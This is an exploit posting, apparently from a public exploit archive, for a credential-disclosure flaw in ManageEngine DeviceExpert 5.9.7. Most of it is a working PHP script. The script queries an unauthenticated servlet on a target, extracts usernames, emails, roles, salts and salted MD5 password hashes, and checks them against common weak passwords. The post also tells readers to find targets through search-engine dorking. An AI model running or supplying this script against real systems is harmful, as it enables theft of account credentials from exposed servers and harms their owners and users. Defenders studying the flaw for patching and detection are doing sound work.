Headline
ManageEngine DeviceExpert 5.9.7 Build 5970 Hash Disclosure
ManageEngine DeviceExpert version 5.9.7 build 5970 allows for usernames and salted MD5 password hashes to be disclosed.
====================================================================================================================================| # Title : DeviceExpert v 5.9.7 build 5970 PHP extracts Credentials Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) || # Vendor : https://manageengine.com/ |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This PHP COde extracts usernames and salted MD5 password hashes from ManageEngine DeviceExpert version 5.9 build 5980 and prior.[+] LIne 87 set your targer . [+] usage : C:\www\test>php 3.php[+] Payload :<?phpclass ManageEngineDeviceExpert { private $host; private $port; private $ssl; public function __construct($host, $port = 6060, $ssl = true) { $this->host = $host; $this->port = $port; $this->ssl = $ssl; } private function sendRequest($path) { $url = ($this->ssl ? 'https://' : 'http://') . $this->host . ':' . $this->port . $path; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); return $response; } public function getUsers() { echo "Reading users from master...\n"; $response = $this->sendRequest('/ReadUsersFromMasterServlet'); if (!$response) { echo "Connection failed\n"; return null; } if (strpos($response, '<discoverydata>') !== false) { preg_match_all('/<discoverydata>(.*?)<\/discoverydata>/', $response, $matches); echo "Found " . count($matches[0]) . " users\n"; return $matches[0]; } else { echo "Could not find any users\n"; return null; } } public function parseUserData($user) { if (!$user) return null; preg_match('/<username>([^<]+)<\/username>/', $user, $username); preg_match('/<password>([^<]+)<\/password>/', $user, $encoded_hash); preg_match('/<userrole>([^<]+)<\/userrole>/', $user, $role); preg_match('/<emailid>([^<]+)<\/emailid>/', $user, $email); preg_match('/<saltvalue>([^<]+)<\/saltvalue>/', $user, $salt); $hash = base64_decode($encoded_hash[1]); $password = null; $weak_passwords = ['12345', 'admin', 'password', $username[1]]; foreach ($weak_passwords as $weak_password) { if (md5($weak_password . $salt[1]) == bin2hex($hash)) { $password = $weak_password; break; } } return [ 'username' => $username[1], 'password' => $password, 'hash' => bin2hex($hash), 'role' => $role[1], 'email' => $email[1], 'salt' => $salt[1] ]; } public function run() { $users = $this->getUsers(); if (!$users) return; foreach ($users as $user) { $user_data = $this->parseUserData($user); if (!$user_data) continue; echo "User: " . $user_data['username'] . "\n"; echo "Password: " . ($user_data['password'] ? $user_data['password'] : 'Not found') . "\n"; echo "Hash: " . $user_data['hash'] . "\n"; echo "Role: " . $user_data['role'] . "\n"; echo "Email: " . $user_data['email'] . "\n"; echo "Salt: " . $user_data['salt'] . "\n"; echo "----------------------------\n"; } }}// استخدام الكلاس$deviceExpert = new ManageEngineDeviceExpert('127.0.0.1');$deviceExpert->run();?>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================